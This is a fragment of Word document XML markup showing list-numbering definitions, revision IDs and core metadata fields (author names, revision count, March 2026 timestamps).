  <w:num w:numId="6" w16cid:durableId="627978090">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1162352417">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="842430938">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="314646954">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1939944612">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2041473530">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="510487949">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="495651349">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1893148265">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="765151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389"/>
    <w:rsid w:val="002900AD"/>
    <w:rsid w:val="00513389"/>
    <w:rsid w:val="00E3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6E8F"/>
  <w15:docId w15:val="{BE347F70-79B2-451A-A73C-152CDC78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8" w:line="259" w:lineRule="auto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Nguyen The</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Hoằng Minh</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-21T03:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-21T03:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>